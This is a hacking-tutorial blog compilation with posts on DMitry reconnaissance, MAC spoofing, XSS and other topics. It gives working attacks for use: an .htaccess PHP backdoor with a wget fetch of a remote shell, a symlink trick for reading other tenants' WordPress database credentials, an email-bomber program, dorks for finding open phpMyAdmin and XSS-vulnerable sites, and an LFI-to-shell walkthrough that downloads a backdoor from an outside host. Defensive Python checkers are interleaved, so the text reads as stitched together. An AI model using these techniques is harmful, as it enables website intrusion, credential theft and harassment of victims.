Dmitry Deepmagic Information Gathering Tool in kali linux


DMitry (Deepmagic Information Gathering Tool) is a Linux command-line application written in C.
DMitry gathers as much information as possible about a host. Its base functionality can find possible subdomains and email addresses, retrieve uptime information, run a TCP port scan, perform whois lookups, and more.

The information is gathered with the following methods:

* Perform an Internet Number whois lookup.
* Retrieve possible uptime data, system and server data.
* Perform a subdomain search on a target host.
* Perform an e-mail address search on a target host.
* Perform a TCP port scan on the target host.
* A modular program allowing user-specified modules.

Open DMitry in Kali Linux

Application ==> Kali Linux ==> Information gathering ==> Live Host Identification ==> dmitry



Syntax:

dmitry -(Switches)  (victim) 

Example:

dmitry -p 192.168.1.5

-o

This switch saves the output to a file with the name you specify. The default is host.txt, but you can name it anything you want.
Syntax: dmitry -s domain -o filename
Ex: dmitry -s google.com -o filename

-i

This switch performs a whois lookup on the IP address of a host. If we only know the host name, dmitry will find the IP for us.
Syntax: dmitry -i IP address
Ex: dmitry -i 192.168.71.128

-w

This switch performs a whois lookup on the domain name of a host.
Syntax: dmitry -w domain
Ex: dmitry -w google.com

-n

This switch gives us Netcraft.com information on a host.
Syntax: dmitry -n domain
Ex: dmitry -n facebook.com

-s

This switch performs a search for possible subdomains.
Syntax: dmitry -s domain
Ex: dmitry -s yahoo.com

-e

This switch performs a search for possible email addresses.
Syntax: dmitry -e domain
Ex: dmitry -e yahoo.com

-p

This switch performs a TCP port scan on a host.
Syntax: dmitry -p IP address
Ex: dmitry -p 192.168.1.10

-f

This switch performs a TCP port scan on a host and reports filtered ports in the output (useful if there is a firewall in place). For this switch to work, -p must also be set.
Syntax: dmitry -pf domain
Ex: dmitry -pf google.com


Alert: Tor Browser app in the Apple Store is fake, spreading malware and spyware! Do not download!

The Tor Browser app in the Apple App Store is fake and has been found spreading adware and spyware.



According to the official website of Tor Browser, the Browser app available in Apple store on iTunes is fake and has nothing to do with the official version. The developers of Tor said that:

Tor Browser in the Apple App Store is fake. It’s full of adware and spyware. Two users have called to complain. We should have it removed.

The company has been complaining to Apple Inc. for over two months. However, Apple has not removed the app so far.

Xenotix Keylogger For Firefox



This is a Firefox add-on which keylogs everything. Logs can be retrieved by pressing “alt + x”. A very simple and effective add-on.


Create Backdoor in .htaccess



Creating a backdoor in .htaccess (Hypertext access)

1: Go to public_html in the shell and edit the .htaccess file.

PHP code
-------------------------------------------------------
<?php
<Files ~ "^\.ht">
Order allow,deny
Allow from all
</Files>
AddType application/x-httpd-php .htaccess

# <?php passthru($_GET['cmd']); ?>
-------------------------------------------------------
Then type commands like this:

yoursite.com/.htaccess?cmd=

For shell upload:

yoursite.com/.htaccess?cmd=wget -O xyz.php http://yourothersitewithshell/yourshell.txt


Now you can access your shell..



Change Mac Address in Backtrack



Today I am going to show you how to change your MAC address in BackTrack.

What is a MAC address?

A media access control address (MAC address) is a unique identifier assigned to network interfaces for communications on the physical network segment. MAC addresses are used as a network address for most IEEE 802 network technologies, including Ethernet. Logically, MAC addresses are used in the media access control protocol sublayer of the OSI reference model.

Changing the MAC address in BackTrack is pretty easy:

1: Open a console, then type ifconfig eth0 down
2: Now type macchanger -r eth0
3: ifconfig eth0 up

Command 1 disables eth0.
Command 2 generates a random MAC address.
Command 3 enables eth0 again.

Change the MAC address to one of your choice:

Open a terminal and type:
4: ifconfig eth0 down
5: macchanger --mac followed by your MAC address, written as six colon-separated pairs, then the interface, for example:
   macchanger --mac 11:22:33:44:55:66 eth0
6: ifconfig eth0 up


Speed Up Internet Connection Response Time


I have a secret to increase your internet connectivity response time, or at least lower the delay. This works with games; however, I can still notice a significant change in browsing experience.

1: Open CMD by pressing the Windows key + R and typing cmd in the text box. Type ipconfig in cmd.
2: Open Regedit by pressing the Windows key + R and typing regedit in the text box.
3: In Regedit, go to:
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces

4: In cmd, the output of ipconfig is where you will find your IP address.

5: In Regedit, find the interface with that (your) IP address.

6: In that key (you can also do this for every interface you see), add a new DWORD (32-bit) Value, in decimal, name it (CASE SENSITIVE) TcpAckFrequency and assign it the value 1 by double-clicking it. Add another value, name it TCPNoDelay and assign it the value 1. All of the names are case sensitive.
After that, you definitely need to reboot.


Best E-Books on Hacking- FREE


I am sharing here some of the best e-books on different topics like hacking, viruses and malware, cryptography, forensics, cyber security, etc. These e-books are available on the internet for free, but I thought I would put them together here. I am sharing them here ABSOLUTELY FREE; just download them.


what is symlink

Symlink is basically a Linux function that allows you to make a shortcut (reference) to another file or directory. On Linux servers (shared hosting) there are many users on one server, and the hosting space is divided into different parts. If you look at it with a hacker's eye, how would they use it for evil purposes?
When a hacker hacks into a website, uploads a shell and gets full access to that particular website and its user, he can only make changes in the specific disk space that is granted to that particular user. He has no access to other users' space, but he can use this function to read sensitive files, i.e. database configuration files.
Example: you and I have websites on the same server, and you have installed the WordPress CMS on your website. We are on the same server, so I can try symlinking your WordPress config file to get the details of your database user and password, and then log in to the MySQL server easily.

Suppose your website directory is

/home/target/public_html/

and mine is

/home/Cyber-Warriors/public_html/

WordPress has its default config file here ===> /public_html/wp-config.php
and it includes your database information.
The question now is: how am I going to get the database information in that file when I can't access your disk space?

We can try a symlink, so what I can do is

execute this command:

ln -s /home/target/public_html

(Execute this command in a new folder, because we are also going to write some .htaccess configuration code that will allow us to read all files in .txt format.)
Now we will see another folder created in the same directory where we executed the command, but we still can't access it.
We need to add a configuration file that tells the server how to open it:
------------------------------------------------------
Options all
DirectoryIndex Sux.html
AddType textplain .log
AddType textplain .php
AddType textplain .conf
AddType textplain .sql
AddHandler server-parsed .php
AddHandler txt .html
Require None
Satisfy Any
------------------------------------------------------
What will this code do? It will treat all .log, .php, .conf and .sql files as plain text.
Now you can access the target user's directory by using this:
http://yourwebsite/yourfolder/symlinkdir/

You will see all files of the target directory. Now just read the config file, get the database user and password, log in to the MySQL server with his account, and add a new admin to his website from there.

How can you patch this?

We can change the permissions of ln for non-root users by issuing the command
chmod 760 /bin/ln
or we can change the php.ini file of the main server and disable the proc_open and symlink functions there.
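
A defender-side check for the two .htaccess abuses described on this page: the PHP handler mapped onto .htaccess itself (the backdoor post) and the override file that serves another user's PHP and config files as plain text through a symlink (this post). This is an added example, not code from the original posts; the function name, rule names and both sample files are constructed for illustration.

```python
import re

# Rule names are hypothetical labels for this example, not Apache terms.
PHP_ON_HT = re.compile(r"^(AddType|AddHandler)\s+\S*php\S*\s+.*\.ht", re.I)
SRC_AS_TEXT = re.compile(r"^AddType\s+text/?plain\s+.*\.(php|conf|sql|inc)\b", re.I)
HT_SECTION = re.compile(r"^<Files(Match)?\b[^>]*\.ht", re.I)
SECTION_END = re.compile(r"^</Files(Match)?>", re.I)
ALLOW_ALL = re.compile(r"^(Allow\s+from\s+all|Require\s+all\s+granted)\b", re.I)
SATISFY_ANY = re.compile(r"^Satisfy\s+Any\b", re.I)
RISKY_OPTIONS = {"all", "followsymlinks", "+followsymlinks", "indexes", "+indexes"}


def audit_htaccess(text):
    """Return a list of (line_number, rule, line) findings for one .htaccess."""
    findings = []
    in_ht_section = False
    for number, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        # PHP tags are checked before comments are skipped: once the file is
        # handed to the PHP handler, a '#' line is still parsed as PHP.
        if "<?" in line:
            findings.append((number, "embedded-php-tag", line))
        if not line or line.startswith("#"):
            continue
        if HT_SECTION.match(line):
            in_ht_section = True
        elif SECTION_END.match(line):
            in_ht_section = False
        elif in_ht_section and ALLOW_ALL.match(line):
            findings.append((number, "ht-files-readable", line))
        if PHP_ON_HT.match(line):
            findings.append((number, "php-handler-on-htaccess", line))
        if SRC_AS_TEXT.match(line):
            findings.append((number, "source-served-as-text", line))
        if SATISFY_ANY.match(line):
            findings.append((number, "access-control-bypassed", line))
        words = line.lower().split()
        if words[0] == "options" and RISKY_OPTIONS & set(words[1:]):
            findings.append((number, "risky-options", line))
    return findings


# Constructed sample modelled on the backdoor post (payload replaced by a stub).
BACKDOOR_SAMPLE = r"""<Files ~ "^\.ht">
Order allow,deny
Allow from all
</Files>
AddType application/x-httpd-php .htaccess
# <?php /* payload elided */ ?>
"""

# Constructed sample modelled on the symlink post's override file.
SYMLINK_SAMPLE = """Options all
AddType textplain .php
AddType textplain .conf
AddHandler server-parsed .php
Require None
Satisfy Any
"""
```

Run `audit_htaccess` over every .htaccess under the hosting root; any finding in a customer directory is worth a manual look, since none of these directives is needed by a normal site.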




How to make an email Bomber




What you will need

1. Microsoft Visual Basic 2010
You Can Download Microsoft Visual Basic 2010  Download!!
So let's Start
1:Open up Visual Basic 2008
2:Create a New Windows Form Application and name it anything you want for example I have named it Cyber-Bomb Then Click OK.
3:Click the window that looks like a new window. Go to the settings on the right and scroll down to the bottom until you find Text. Edit this to what you want to appear at the top of your application; for example, I have called mine Cyber-Bomb.
4:Now it is time for you to design and make the application. Add 3 buttons named Start, Stop and Exit. You can change the names by clicking them and then typing.
5:Now Add 5 Text-boxes Named
(5.1):Google-mail Username
(5.2):Google-mail password
(5.3):Victims Email
(5.4).Email subject
(5.5).Email message (Make the 5th Text-Box multiline)
6:Now Add One timer.(Do NOT edit anything in this)
7:Add a Label, click it and type the number 0.
8:If you have followed It so far accurately It should look something like this.
9:OK. We have now done the fun bit designing. Now it is time to code it all so it will all work.
10:Double Click The start button and type in
Code:
Timer1start()
11:Double Click The Stop button and type in
Code:
Timer1.stop()
12:Double Click The Exit button and type in
Code:
End
13:Go right to the top of the coding page and above “Public Class” type in
Code:
Imports System.Net.Mail
14)If you have followed it correctly so far it should look something like this
15)Now Double click the Timer and type in
Code:
Dim MyMailMessage As New MailMessage()
MyMailMessage.From = New MailAddress(TextBox1.Text)
MyMailMessage.To.Add(TextBox3.Text)
MyMailMessage.Subject = (TextBox4.Text)
MyMailMessage.Body = TextBox5.Text
Dim SMTPServer As New SmtpClient("smtp.gmail.com")
SMTPServer.Port = 587
SMTPServer.Credentials = New System.Net.NetworkCredential(TextBox1.Text, TextBox2.Text)
SMTPServer.EnableSsl = True
Label1.Text = Val(Label1.Text + 1)
SMTPServer.Send(MyMailMessage)
16)Now once you have done that.
17)Now Press F5 or click the green Arrow on the top toolbar to Debug and run/test.
18)This only works with googlemail as it uses their SMTP server. This is nothing special; however, it does send mass emails to the victim, and Google does ban accounts that are caught spamming like this, so you may be required to make a fair few accounts.
20)This is very basic as you can see but you can mess around with styles and jazz it up a bit for your liking.


Find Phpmyadmin without login and hack website





Search in google

intitle : phpmyadmin inurl:server_processlist.php
intitle : phpmyadmin inurl:tbl_operations.php
intitle : phpmyadmin inurl:server_collations.php
intitle : phpmyadmin inurl:server_databases.php
intitle : phpmyadmin inurl:server_export.php
intitle : phpmyadmin inurl:server_engines

Share a keyboard and mouse with multiple computers using only software



Hello, friends! NightStalker here. Today I will show you how to control multiple PCs with the help of simple software, so if you have more than one, stop jumping from one keyboard and mouse combination to another every time you switch computers. Control multiple computers using just one set, without the need for extra hardware. QuickSynergy for Linux and Mac, working with Synergy for Windows, means there’s no combination of systems that can’t be controlled this quickly and easily. If there’s more than one computer on your desk then you need to check this out.
Multiple monitors are intuitive: you move your mouse from one screen to another and simply continue controlling. But what if your desk has multiple computers on it? Can you move your mouse from one computer to another, then work on that? And what about copy/paste functionality? That, as it turns out, can be just as simple as using multiple monitors, even if you’re using different operating systems.

So let the fun begin!

1: Go to Synergy's website and click the Download link. Either make a donation or click Continue. Download the correct installer for your operating system. Choose 32-bit if you aren’t sure which version of Windows you have.

2: Run the file you just downloaded. Agree to the terms and conditions, then click next to install the software. You’ll need to download and install the appropriate version of the Synergy software on each computer you intend to use with your shared mouse and keyboard.

3: Log in to your router via your web browser. Look for a page which lists all the devices connected to the router. Identify your 'Master' computer, and ensure its IP address is set to be static rather than dynamic, with a value such as 192.168.1.10.

4: Still within the router’s interface, another option will allow you to open ports for certain applications. Synergy uses 24800 by default, so follow your router's manual or online help to open this port, enabling both TCP and UDP protocols for this port, and ensure it is applied to your Master computer (usually you select it from a list or enter its IP address). Save the changes.

5: On the Master computer, launch Synergy, then tick the box labelled Server. Click Configure Server. For each client, drag the monitor icon from the top right into the main window and arrange monitors in the order in which they’re positioned on your desk. Double click each icon, then give it a unique screen name. Click OK, then click Start.

6: On each client computer, open the Synergy application, go to the settings and ensure it has the same screen name you chose in the last step. Tick the box next to Client. Enter your master computer’s IP address. Then click Start. If all is well, it should say ‘connected to server’ and you can move your mouse between your computers and use the keyboard to type.


Xss Attack tutorial






                                                                         Introduction


'XSS', also known as 'CSS' (Cross Site Scripting), is a very common vulnerability found in web applications. XSS allows the attacker to inject malicious code. The cause is that the developer trusts user input, or filters it incorrectly, and then sends the user input back to the client browser, where the malicious code executes.
                                                                   
                                                                          Types of XSS

There are three types of XSS:
• Persistent (stored) XSS = the attack is stored on the website's server
• Non-persistent (reflected) XSS = the user has to go through a special link to be exposed
• DOM-based XSS = the problem exists within the client-side script


                                                                         Persistent  XSS


The persistent XSS vulnerability is a more devastating variant of a cross-site scripting flaw: it occurs when the data provided by the attacker is saved by the server, and then permanently displayed on "normal" pages returned to other users in the course of regular browsing, without proper HTML escaping. A classic example of this is with online message boards where users are allowed to post HTML formatted messages for other users to read. Put simply, persistent XSS occurs when the developer stores user input in a database server, or simply writes it to a file, without proper filtering, and then sends it back to the client browser.


To test for the vulnerability, use this script: <script>alert("HELL")</script>

If you get this popup, your site is vulnerable.
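
The stored-XSS flow described above, shown as a vulnerable message-board renderer beside a hardened one that escapes at output time. This is an added example, not code from the original tutorial; the `POSTS` data and all function names are constructed for illustration.

```python
import html

# The probe string from the text, used here as a regression-test input.
PROBE = '<script>alert("HELL")</script>'

# Constructed sample data standing in for rows read back from the database.
POSTS = [
    {"author": "alice", "body": "Welcome to the board!"},
    {"author": 'bob "the admin"', "body": PROBE},
]

TEMPLATE = '<div class="post" title="%s">%s</div>'


def render_unsafe(posts):
    """Vulnerable: stored input is concatenated into the page as-is."""
    return "".join(TEMPLATE % (p["author"], p["body"]) for p in posts)


def render_safe(posts):
    """Hardened: every stored value is HTML-escaped when it is written out.

    quote=True also encodes " and ', which is what keeps a value from
    closing the title="..." attribute it is placed in.
    """
    return "".join(
        TEMPLATE % (html.escape(p["author"], quote=True),
                    html.escape(p["body"], quote=True))
        for p in posts
    )


def contains_live_markup(page, probe=PROBE):
    """Regression check: True if the probe came back unescaped."""
    return probe in page
```

Escaping belongs at the point of output, as in `render_safe`, because the same stored value may later be written into a different context that needs a different encoding.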



                                                             Dorks


  • !xss inurl:com_feedpostold/feedpost.php?url=


    • !xss inurl:/products/orkutclone/scrapbook.php?id=

    • !xss inurl:/products/classified/headersearch.php?sid=

    • !xss inurl:/poll/default.asp?catid=

    • !xss inurl:/search_results.php?search=Search&k=

    • !xss /preaspjobboard//Employee/emp_login.asp?msg1=

    • !xss pages/match_report.php?mid= pages/match_report.php?mid=

    • !xss /notice.php?msg= /notice.php?msg=

    • !xss /gen_confirm.php?errmsg= /gen_confirm.php?errmsg=

    • !xss /index.php?option=com_easygb&Itemid=

    • !xss /2wayvideochat/index.php?r=

    • !xss /view.php?PID= /view.php?PID=

    • !xss /Property-Cpanel.html?pid= /Property-Cpanel.html?pid=

    • !xss /showproperty.php?id= /showproperty.php?id=

    • !xss /vehicle/buy_do_search/?order_direction=

    • !xss /elms/subscribe.php?course_id= /elms/subscribe.php?course_id=

    • !xss /winners.php?year=2008&type= /winners.php?year=2008&type=

    • !xss /schoolmv2/html/studentmain.php?session=

    • !xss /site_search.php?sfunction= /site_search.php?sfunction=

    • !xss /search.php?search_keywords= /search.php?search_keywords=

    • !xss /hexjector.php?site= /hexjector.php?site=

    • !xss /news.php?id= /news.php?id=

    • !xss /index.php?view=help&faq=1&ref=

    • !xss inurl:"contentPage.php?id="

    • !xss inurl:"displayResource.php?id="

    • !xss intext:"Website by Mile High Creative"

    • !xss index.php?option=com_reservations&task=askope&nidser=2&namser= "com_reservations"

    • !xss /info.asp?page=fullstory&key=1&news_type=news&onvan=

    • !xss /ser/parohija.php?id= /ser/parohija.php?id=

    • !xss /strane/pas.php?id= /strane/pas.php?id=

    • !xss /main.php?sid= /main.php?sid=




                                                          




    Local File inclusion (LFI)

            Local File inclusion*Shell upload*| Tutorial


    In this article he will demonstrate a local file inclusion vulnerability and he will enhance the attack by uploading a shell on the website. Here are some of the common parameters which are vulnerable to local file inclusion or remote file inclusion attacks.

    *index.php?homepage=
    *index.php?page=
    *index.php?index2=

    Requirements:

    *A Vulnerable Website      
    * shell
    * User-Agent switcher   
    * Mozilla Firefox

    The first thing a hacker will do when looking for an LFI vulnerability is try to locate the /etc/passwd file. Being able to read this file indicates that a local file inclusion vulnerability is present in the website. The image below explains the whole story: “root” is the username, followed by “x”, which stands for the password; however, here it’s shadowed, which means that it’s present in the /etc/shadow file, which is only accessible when you have root privileges.



    Next the hacker will check for /proc/self/environ. So change your path to /proc/self/environ/. The /proc/self/environ/ page should look something like this if the file exists, not all sites have it.


    Once the local file inclusion vulnerability has been identified, the hacker will try to perform remote code execution and somehow gain further access. This can be done by uploading a PHP backdoor. For that purpose a commonly used tool is User Agent Switcher.
                              

    The hacker edits the User-Agent and changes its contents to the following:


    <?php phpinfo();?>


    Select your User-Agent in Tools > Default User Agent > PHP Info (or whatever your User Agent is called)





    After refreshing the website, he then searches for the keyword "disable_functions" (Ctrl+F search function)
    disable_functions | no value | no value
    The above line tells us that the website is vulnerable to remote code execution, and now we can upload the PHP backdoor. On finding that the website is vulnerable, he then tries to upload the shell by using the following command:
    <?exec('wget http://www.sh3ll.org/egy.txt -O shell.php');?>
    Where the above code uploads a PHP backdoor in a text form and later renames it to .php. Now the shell has been successfully uploaded. Once the PHP backdoor has been uploaded it will look like the following:
                      

                  For any problem please comment................
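
The request sequence described in this tutorial leaves clear traces in a web server access log: traversal and /etc/passwd or /proc/self/environ in an include parameter, followed by PHP tags in the User-Agent. The detector below is an added example, not part of the original article; the log lines are constructed samples in combined log format, and the function and finding names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Combined format: ip - user [time] "METHOD uri proto" status size "referer" "agent"
LINE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "(.*)"$')
SENSITIVE = ("/etc/passwd", "/proc/self/environ")


def classify(line):
    """Return (client_ip, findings) for one log line, or None if unparsable."""
    m = LINE.match(line)
    if not m:
        return None
    ip, _method, uri, _status, agent = m.groups()
    findings = set()
    for name, value in parse_qsl(urlsplit(uri).query, keep_blank_values=True):
        decoded = unquote(value)  # parse_qsl decoded once; catch double encoding
        if "../" in decoded or "..\\" in decoded:
            findings.add("traversal:" + name)
        if any(path in decoded for path in SENSITIVE):
            findings.add("sensitive-file:" + name)
    if "<?" in agent:  # a browser User-Agent never contains a PHP open tag
        findings.add("php-in-user-agent")
    return ip, findings


def triage(lines):
    """Group findings per client. A client that requests a sensitive file through
    a parameter and also sends PHP in the User-Agent is rated critical."""
    per_ip = {}
    for line in lines:
        parsed = classify(line)
        if parsed and parsed[1]:
            per_ip.setdefault(parsed[0], set()).update(parsed[1])
    report = {}
    for ip, found in per_ip.items():
        injected = "php-in-user-agent" in found and any(
            f.startswith("sensitive-file:") for f in found)
        report[ip] = ("critical" if injected else "suspicious", sorted(found))
    return report


# Constructed sample log lines (documentation IP ranges).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Mar/2024:10:00:01 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 1843 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Mar/2024:10:00:09 +0000] "GET /index.php?page=..%2F..%2F..%2Fproc%2Fself%2Fenviron HTTP/1.1" 200 912 "-" "<?php phpinfo();?>"',
    '198.51.100.4 - - [10/Mar/2024:10:01:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]
```

A critical rating on a request that returned status 200 means the include parameter should be treated as exploited: restrict it to an allowlist of page names and check the web root for files created after that timestamp.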

